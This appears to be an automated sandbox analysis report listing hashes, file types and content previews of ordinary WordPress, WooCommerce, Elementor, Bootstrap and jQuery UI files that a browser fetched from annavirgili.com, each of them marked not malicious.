                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: http://annavirgili.com
                                                                                                          No simulations
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (62753), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):62755
                                                                                                          Entropy (8bit):4.848886996046838
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:SI5zYtqpLO8NXQ6KmdbqmMk8gBS0O1x0clK0N4e:F5zYtMQ6/dbqmMkvC7
                                                                                                          MD5:979B8B56E801469D95453055366EF54C
                                                                                                          SHA1:CB8A0BB5F00FEE130A289EA4DFAFC00FA53E1C04
                                                                                                          SHA-256:D3322CCB3912F7A9485EB1D75971FD5E1EB49C6575FF5AD985FB5496333E8C8B
                                                                                                          SHA-512:AFD7E2E5E1C908F3D4AAC6151E3ECF4D575222EADC5458C4118BF9C4E05D150D77CEF43E0A3D36101E0D1288973C27BB576F46B1449E9CE537C03E15AE5BF3BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.1
                                                                                                          Preview:@charset "UTF-8";:root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}@-webkit-keyframes spin{100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@font-face{font-family:star;src:url(../fonts/star.eot);src:url(../fonts/star.eot?#iefix) format("embedded-opentype"),url(../fonts/star.woff) format("woff"),url(../fonts/star.ttf) format("truetype"),url(../fonts/star.svg#star) format("svg");font-weight:400;font-style:normal}@font-face{font-family:WooCommerce;src:url(../fonts/WooCommerce.eot);src:url(../fonts/WooCommerce.eot?#iefix) format("embedded-opentype"),url(../fonts/WooCommerce.woff) format("woff"),url(../fonts/WooCommerce.ttf) format("truetype"),url(../fonts/WooCommerc
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (20372)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):20415
                                                                                                          Entropy (8bit):5.112597669901674
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:/Nd4dUtaQ9HuGJswyVO+pYDTWmMo7YtDTRHJiM3kohVvFhN7KOljuOzQYqEbzGvy:/Nd4dUtaQ9HuGJswyV/pkTAQYtDTRHJd
                                                                                                          MD5:A11D02D00B6F15E20609B4F8FF56C270
                                                                                                          SHA1:B7519FB554E01DE96704303B1469BE3C31CD548B
                                                                                                          SHA-256:20EDFBBE7C60D8E3562BDCDA2DFCA7CE7C2F7F55B67FE478904B9FC74A8D6C7D
                                                                                                          SHA-512:0A4BCE6522A16B2A103CFD701BED9A6514BC16764410B434FEA3251BDE80F72422B3B3B0C985384B6F7E5590223A46C548524B4C6182C6629E73179AF3CF17F9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.6.4
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[819],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports},2:(e,t,n)=>{"use strict";var s=n(7914);n(4242);var i=s(n(4774)),o=s(n(9575)),r=s(n(6254)),a=s(n(5161)),l=s(n(5039)),c=s(n(9210));class ElementorProFrontend extends elementorModules.ViewModule{onInit(){super.onInit(),this.config=ElementorProFrontendConfig,this.modules={}}bindEvents(){jQuery(window).on("elementor/frontend/init",this.onElementorFrontendInit.bind(this))}initModules(){let e={motionFX:i.default,sticky:o.default,codeHighlight:r.default,videoPlaylist:a.default,payments:l.default,progressTracker:c.default};elementorProFrontend.trigger("elementor-pro/modules/init:before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActi
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3053
                                                                                                          Entropy (8bit):3.887265636358029
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:P/M8xKhcYZkrMgtpRkMMtMbpbM3PMVsnYtE8rY8Wysl+y2:P/jxKhcYSr1pRIUpbSP3YtzrY8WyVy2
                                                                                                          MD5:0624A076A8B15D2D238FB31043BED59C
                                                                                                          SHA1:A1F9ADBCB37555B3ADB1F59666CE22DB51658382
                                                                                                          SHA-256:CB8528F82C58653AB48A3C62C296C0E5B8483AB9D53A435D1372D401FD2A63D0
                                                                                                          SHA-512:CB7FA810802EBD7BF47EAA3CFC464F9793AAFE3767C662D2C211C9A12ED99F078090919D88F2BC0B17F56B237390D176A2621D408FBA2893C246AF2BECA12EB2
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function ($) {. $.extend({. AdvanceWooDiscountRules: {. form: null,. product_id: null,. quantity: 0,. options: [],. target: null,. getDynamicDiscountPriceFromCartForm: function($form, $target, $options){. if (typeof $options !== 'undefined') {. this.options = $options;. }. if (typeof $target !== 'undefined') {. this.target = $target;. }. if (typeof $form !== 'undefined' && $form.is('form')) {. this.form = $form;. } else {. this.logError("Incorrect form provided");. }. this.product_id = this.getProductIdFromForm();.. this.quantity = this.getProductQuantityFromForm();. this.getDiscountPriceForProduct();. },. getDiscountPriceForProduct: function () {. if(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1381
                                                                                                          Entropy (8bit):4.155987463755011
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:248Zea1ehQqpuJhXjlKmhWmaCl/MyOZuN7NJJbqAFuyO3uN82JNM7yakKVec5:tbsjlXJl0y79kyOv7yaku
                                                                                                          MD5:539092F09851831781110DE6A65DB57C
                                                                                                          SHA1:C7DB2DA2B3CE5BBD25903CD7171F5925240A01BF
                                                                                                          SHA-256:3E381AA7C77118147B136C636228D244CAF39E25E51AE60632A25C52AF218EA6
                                                                                                          SHA-512:14440CFF2585022B6645F3F0B4771A0AB07524813364DD05579A50B9B27B5690965B168F5F8FC29011C7602F3C36BAA9314A2707D43891396A237DB317D8A3E6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function ($, elementor) {. "use strict";. var Ciena_Element = {. init: function () {. var widgets = {. 'ciena-category-background.default': Ciena_Element.Category_background. };. $.each(widgets, function (widget, callback) {. elementor.hooks.addAction('frontend/element_ready/' + widget, callback);. });. },. Category_background: function (e) {. var e_cb = e.find('.ciena-category-background');. if (e_cb.length) {. $(document).on("mouseover",'.ciena-category-background .categories-item' ,function () {. var $this = $(this);. if ($this.hasClass('selected')){. return false;. }. var id = $this.data('id');. $('.ciena-category-background .categories-item').removeClass('selected');. $this.addClass('selected');..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (57791)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58072
                                                                                                          Entropy (8bit):5.247960089226309
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:5NYyDyKAmHVaS3m3Dqp0NwCkXDtdFDLmTV+miDNJcJiQMRqyPiYtB6UvcCg8YGk:5NTKktDLmTF8yJL45XtHjoGk
                                                                                                          MD5:E1D98D47689E00F8ECBC5D9F61BDB42E
                                                                                                          SHA1:6778FED3CF095A318141A31F455C8F4663885BDE
                                                                                                          SHA-256:0A34A87842C539C1F4FEEC56BBA982FD596B73500046A6E6FE38A22260C6577B
                                                                                                          SHA-512:021E615983F30EC5477FD8B611E8C5045AC6D9900F9A9BB8649B56E0C7D282965A727F8CF501C3B7E1DDFF02F5B44924D5481BCEA7A926BE8A9E166314A07ED0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,g,u){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescriptor
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):440
                                                                                                          Entropy (8bit):7.030367132128833
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:6v/7m/6T/Hru0XU27qHmAc//lU+UqDa/lpcXxg:b/6fu0X2EWqD0iX2
                                                                                                          MD5:7AFB68F6F985FF9DA11D01FBAA61EE8D
                                                                                                          SHA1:B87A5E7620392C23A02507B29655F0AA43F8A8C0
                                                                                                          SHA-256:19F3B464EFAC9CBAC3BC1224A39CD06BAD1FE361DE9C1794EF50FDAED825C67F
                                                                                                          SHA-512:F77F03CADD5B98C63259DF75506F66241341412AC960C043C0CFA8C0A1820345385B876FE627F5576451EFD6E1B22F4705A675860AEBB0449C61B2E1E3ADC804
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/it.png
                                                                                                          Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...>IDATx..=N.@....m@.$."MJ:..U.4...C..$..F..(Bb.g....Xq.v.(#.vF.}.f...61.l....Y.'..gwW_..7........B..........W~.u|TPV.....h.@.|FbSF:i../.?8.G...B....=%..F...e..h.B.m4#.....~*~<)...M.0.'.$.i#..<\..N.....RZ.6^|#..2.3......&jG.U.Z.P..8;g..zD<.P....Z..A[[20....R/.(..1.l...3~..<.....u.]+g.t.>....$....b..5.r..M..w....hL.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (343)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):47022
                                                                                                          Entropy (8bit):4.191716823089285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:KXVwFYcKI2qmW57vTvTepgYWMOO8g2QQ2ncYnsZydTngvS1XmKCfd:uVwFY9qmW577ypGO8gbncYns01XmKCfd
                                                                                                          MD5:C8BCA704A3B7D6455566376D42EB63E6
                                                                                                          SHA1:9389F63FDD52C81E99FDA08233094A2008DEE8A6
                                                                                                          SHA-256:40CC3ED05635E77032BEDE8682A49313A2238D0023C753327A9FE22AB8595B96
                                                                                                          SHA-512:91240898683169CA42177A53D9C513BD3C5AB52893AD450D0F855BA55013975D35B15AB42C33C11F05DCC9A21DD4FCECA82D87B0F0C5F3C18211436720B02570
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function ($) {. "use strict";. var $window = $( window ),. $document = $( document ),. $body = $( 'body' );. var CIENA = CIENA || {};. CIENA.init = function () {. var _t = this;. _t.offCanvas();. _t.stickyHeader();. _t.stickyHeaderMobile();. _t.Vertical_Header();. _t.Announcement();. _t.CountDown();. _t.SwiperInit();. _t.woo_quantily();. _t.Search();. _t.Live_Search();. _t.FillterBtn();. _t.ToggleSubMenu();. _t.productThumbnailZoom();. _t.woofPagination();. _t.WL_update();. _t.Category_background();. _t.fullpage();. _t.InputState();. _t.Scroll_To_top();. _t.stickyAtc();. _t.Select2Init();. _t.ToggleBlockDropdown();. _t.loginPanelAuthenticate();. setTimeout(function () {. _t.Middle_Arrow();. _t.woofClearButton();. _t.checkScrollbar();. _t.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1167
                                                                                                          Entropy (8bit):4.704672144708603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:7G8++Yzc1pWMAmM2lilX3b1MWE6FQIvQkiUfutDXYCRGR24EaqaHZv:7G8+RNKFilb1jBhQkilYCRGXnNv
                                                                                                          MD5:AC759E0CC91B5A81999C481AB8EC7C71
                                                                                                          SHA1:27FAFA683ADF684F70EA3758F19430C17DCE2451
                                                                                                          SHA-256:04C32A0BBF5F05F007948D07C96A980A9BDB029BEAEFE6CAAB17C982F97F70A4
                                                                                                          SHA-512:663842DCB931125AC09AB8BEEC6FDCB3C433F6A322FE6C4E950598815FAAF6D3E93D16F4508250C8A4ADF576A4696516F97C480EC5F37486A695ECD8E3755B5E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_selects() {. . if (woof_select_type == 'chosen') {..jQuery("select.woof_select, select.woof_price_filter_dropdown").chosen();. } else if (woof_select_type == 'selectwoo') {..jQuery("select.woof_select, select.woof_price_filter_dropdown").selectWoo();. }.. jQuery('.woof_select').change(function () {. var slug = jQuery(this).val();. var name = jQuery(this).attr('name');. woof_select_direct_search(this, name, slug);. });.. var containers = jQuery('.woof_hide_empty_container');. jQuery.each(containers, function(i, item){..var selector= jQuery(item).val();..if(selector){.. jQuery(selector).hide();..}... });. .}..function woof_select_direct_search(_this, name, slug) {.. jQuery.each(woof_current_values, function (index, value) {. if (index == name) {. delete woof_current_values[name];. return;. }. });.. if (slug != 0) {. woof_current_values[name] = slug;.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4741)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4776
                                                                                                          Entropy (8bit):5.153085086858448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                          MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                          SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                          SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                          SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                                                                                                          Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10578)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10759
                                                                                                          Entropy (8bit):5.108770861795029
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Cr0AcBogU9EEk7Wxcf55I/6wG5klFhBsR0PWXYpt:Cr0AEPU9EccbUt
                                                                                                          MD5:EC2777F6B09C345D2AB0DEF96B5CAB9D
                                                                                                          SHA1:10713118D9F7AA90BDCE30EA21508B2E99B8B33F
                                                                                                          SHA-256:D9B268266AF74B5C0834E2A519303CA97C5427C5FB7ABB3B89AD29E07664BE14
                                                                                                          SHA-512:77B8845DAA7449A72A6365E75AE56781C82B503619F7D90CE4BA0F5A8C025B59F3881F0BD3B51570B2C3A6567A6BE1E783615954D84B9FFF95812E230CC8FFCB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Slider 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","./mouse","../keycode","../version","../widget"],e):e(jQuery)}(function(o){"use strict";return o.widget("ui.slider",o.ui.mouse,{version:"1.13.3",widgetEventPrefix:"slide",options:{animate:!1,classes:{"ui-slider":"ui-corner-all","ui-slider-handle":"ui-corner-all","ui-slider-range":"ui-corner-all ui-widget-header"},distance:0,max:100,min:0,orientation:"horizontal",range:!1,step:1,value:0,values:null,change:null,slide:null,start:null,stop:null},numPages:5,_create:function(){this._keySliding=!1,this._mouseSliding=!1,this._animateOff=!0,this._handleIndex=null,this._detectOrientation(),this._mouseInit(),this._calculateNewMax(),this._addClass("ui-slider ui-slider-"+this.orientation,"ui-widget ui-widget-content"),this._refresh(),this._a
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):68
                                                                                                          Entropy (8bit):4.148986922130799
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:yionv//thPlE+tJ8/VeyGFFHDhlljp:6v/lhPfA/0y2Vlljp
                                                                                                          MD5:2A637D3D825673C0E3462FA4ED9A1C5C
                                                                                                          SHA1:81668D396DA22832D75A986407FF10035E0D5899
                                                                                                          SHA-256:69539B5B3777CFFDA28A66D7F2AA9B17C91EE1EC8FD50C00C442AF91753A60F7
                                                                                                          SHA-512:DC7C40381B3D22919E32C1B700CCB77B1B0AEA2690642D01C1AC802561E135C01D5A4D2A0EA18EFC0EC3362E8C549814A10A23563F1F56BD62AEE0CED7E2BD99
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/assets/dummy.png
                                                                                                          Preview:.PNG........IHDR.....................IDAT.Wc``......h&Y.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (456)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):648
                                                                                                          Entropy (8bit):5.172228476388626
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:UOpnXGf7y3RbdLhPb/f7ysKIUMbH4J4J5XNyURMJIvfgq3r:NpnX1NhbmSH4J4cvJKft3r
                                                                                                          MD5:64E76CBD1EDB9629EDDC537E047CD84C
                                                                                                          SHA1:A8F8760FCE644F93E5D78B263CE08EAB0DCD1473
                                                                                                          SHA-256:EF0DB6421B0C850DC9B41F38B68B1AAA961719E9C95A160E7F763B0A3BE03419
                                                                                                          SHA-512:A8592DE8473A7A7941455AF182120ADC3FDF2F3B992372C6197E5497741BE43FFCBE9B892D563C264D7A27F043E4B4E7D9A01F6BFC231168329A0B83CF1C58FB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Effects Highlight 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(t){"use strict";return t.effects.define("highlight","show",function(e,n){var o=t(this),i={backgroundColor:o.css("backgroundColor")};"hide"===e.mode&&(i.opacity=0),t.effects.saveStyle(o),o.css({backgroundImage:"none",backgroundColor:e.color||"#ffff99"}).animate(i,{queue:!1,duration:e.duration,easing:e.easing,complete:n})})});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (833)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1020
                                                                                                          Entropy (8bit):5.252559261946358
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Nk1NhbmSH4J4FGMdRHXHF4qOCq5ZNsj6jjVNQoJooToV:NkrsSHC6GCXFpOl/jpNlmeoV
                                                                                                          MD5:0EDB52E6332AA60CB6A38D303A4F68B4
                                                                                                          SHA1:2243987D0F7CB01507331B40AD26F0410D40ED91
                                                                                                          SHA-256:AF0D0BAD3510DB008AC0500B4CA867289F1C93429AE4302A6AD6F8882F416BD3
                                                                                                          SHA-512:08E1529D9964F67126AB2991AB60395AE5CE76375D961596035435068247C0630B1042143B0AEC304D67A44B56F5A10968AA225C37AE9CE47D841B653390C230
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Effects Fold 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(m){"use strict";return m.effects.define("fold","hide",function(i,e){var t=m(this),c=i.mode,n="show"===c,c="hide"===c,s=i.size||15,f=/([0-9]+)%/.exec(s),o=!!i.horizFirst?["right","bottom"]:["bottom","right"],a=i.duration/2,u=m.effects.createPlaceholder(t),l=t.cssClip(),r={clip:m.extend({},l)},p={clip:m.extend({},l)},d=[l[o[0]],l[o[1]]],h=t.queue().length;f&&(s=parseInt(f[1],10)/100*d[c?0:1]),r.clip[o[0]]=s,p.clip[o[0]]=s,p.clip[o[1]]=0,n&&(t.cssClip(p.clip),u&&u.css(m.effects.clipToBox(p)),p.clip=l),t.queue(function(e){u&&u.animate(m.effects.clipToBox(r),a,i.easing).animate(m.effects.clipToBox(p),a,i.easing),e()}).animate(r,a,i.easing).animate(p,a,i.easing).queue(e),m.effects
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (40083)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):81920
                                                                                                          Entropy (8bit):4.572178414886889
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:QqRDsJA3k8+ivAPDQzMRAqYpeOmmiTMG4THtx7Fk:QqRDsJAU8+ivAPDQYRAqSeOmmiTMGcQ
                                                                                                          MD5:86BC37AE57E0EDF1193B15763CF4BE81
                                                                                                          SHA1:7DD152BE6BD4C32776112FCC572EA25567E4C5CD
                                                                                                          SHA-256:1EF6BB473152278043D3D6CF5DB62074333B48974634D045AB7381092CA8446B
                                                                                                          SHA-512:101B375A026EC996383E1959A796A2F3E2EC6929BE8A37DD0AF049E5C7DCD5AA4DEF4153C9D32CEE12785C1056BFCECC8C662C2DE5AA877BBF05EC8789764E0A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/elementor/css/global.css?ver=1709081757
                                                                                                          Preview:.elementor-widget-heading .elementor-heading-title{color:var( --e-global-color-primary );font-family:var( --e-global-typography-primary-font-family ), Sans-serif;font-weight:var( --e-global-typography-primary-font-weight );}.elementor-widget-image .widget-image-caption{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor{color:var( --e-global-color-text );font-family:var( --e-global-typography-text-font-family ), Sans-serif;font-weight:var( --e-global-typography-text-font-weight );}.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:var( --e-global-color-primary );}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap, .elementor-widget-text-editor.elementor-drop-cap-view-default .elementor-drop-cap{color:var( --e-global-color-primary );border-color:var( --e-global-color-pri
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3016)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3300
                                                                                                          Entropy (8bit):5.15422255971796
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:X4OnB3aAn7JHj8+woEJXkjQQC0GCduGGC/zqrbCb:X4OB3rpj8+wlOGCIGGCmrbU
                                                                                                          MD5:135916F0FF0720B4C5E5FD5B43ACD167
                                                                                                          SHA1:0963226836755C1D25EC786A52578A1B93519A6C
                                                                                                          SHA-256:108EABA9F7689F620824BE11EF49B4131611EAE4BEEE2E116FCEC0799117297B
                                                                                                          SHA-512:17F06D215AEE3F4D2781E7F0654B39BE1047FC2AA3718919146EEBBF58EF8FC4BC95B68747D4A3732110C756AAA367F5CC26258DA86CF537F21CEEB8C70881C8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * accounting.js v0.4.2. * Copyright 2014 Open Exchange Rates. *. * Freely distributable under the MIT license.. * Portions of accounting.js are inspired or borrowed from underscore.js. *. * Full details and documentation:. * http://openexchangerates.github.io/accounting.js/. */.!function(n){var f={version:"0.4.1",settings:{currency:{symbol:"$",format:"%s%v",decimal:".",thousand:",",precision:2,grouping:3},number:{precision:0,grouping:3,thousand:",",decimal:"."}}},i=Array.prototype.map,r=Array.isArray,e=Object.prototype.toString;function p(n){return""===n||n&&n.charCodeAt&&n.substr}function l(n){return r?r(n):"[object Array]"===e.call(n)}function m(n){return n&&"[object Object]"===e.call(n)}function d(n,r){for(var e in n=n||{},r=r||{})r.hasOwnProperty(e)&&null==n[e]&&(n[e]=r[e]);return n}function g(n,r,e){var t,o,a=[];if(!n)return a;if(i&&n.map===i)return n.map(r,e);for(t=0,o=n.length;t<o;t++)a[t]=r.call(e,n[t],t,n);return a}function h(n,r){return n=Math.round(Math.abs(n)),isNaN(n)
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3527 x 1006, 8-bit colormap, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):41138
                                                                                                          Entropy (8bit):7.757697474545904
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:UYS8TICIGOGxLtmRFzLnIg++X+A/6x+UL9eopupay96p:V1TlnpxLoRF3nmESg7pZ9S
                                                                                                          MD5:3E4B64FB4725FDFAFA12C8ED7ED195E3
                                                                                                          SHA1:BDB761604E2F572EBED5DAA79C5C7614935A4883
                                                                                                          SHA-256:DBE4D284B9804D59E34887831F9698B5F48EAA787CC5407B9E59AB0F2D4B6D0D
                                                                                                          SHA-512:2C47249260A8A20A88E3D34C1E8039309C5EC64B33B02D22A2FE7F1B1E11C564E86CD61C9A3CCD451F397B35C3A5CD7B535B20B06DE0F010D9430F57BF7AA4B8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-1@4x.png
                                                                                                          Preview:.PNG........IHDR.............@.......pHYs..,J..,J.wztM...3PLTEGpL.................................................A.*....tRNS. .0..`.@...p.P..(.. .IDATx....(........\...=.C..*..7G8l!t..*...0M.8._t.._.<.q....^K=M..1<4.....P8..A.......G.................k./...mn..C.5.5......a..y..9.u..6........+.n.=.&a..d................~5d.....p.......@...0.4.E.9...:.O...w.'....Y..........u.....qEaM.r.G....o........z..0MS.O........Gn.&..c...-.c....o.0.6.X....@mz..5N.3k.\,....l...z../....0y....LWf..G.8.c1v..<r.K.~.\....-.W..}.d.H..l.R.../Eg..cI\. ....zl......U.....q?k.$+.x\..O|....DP..Ug).P..1O....<...MK. 'o..(x..Rz.kJ........[lK.......Q...'.R=.:d......8......q.....|..M......e.&.Z,n..q..qAq.....m.z..*+.....o.9Y..x\...S-U...Y"...mrS...S.j.s?.'{..rF<m...i.......q..@}..Y.k...+<...}....3...4.P....&....w]M.H...^2.o..{..*+.W..I....<......tDRi.2.-[o..}Zcg...^.q?~.Q*..8.......q..J....J..0.qg.'.Ig...-..N..u<...}x...19<.kt.L.w..43...q..y...m.a....8_.|.......r..Go....b....5
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (771), with no line terminators
                                                                                                          Category:dropped
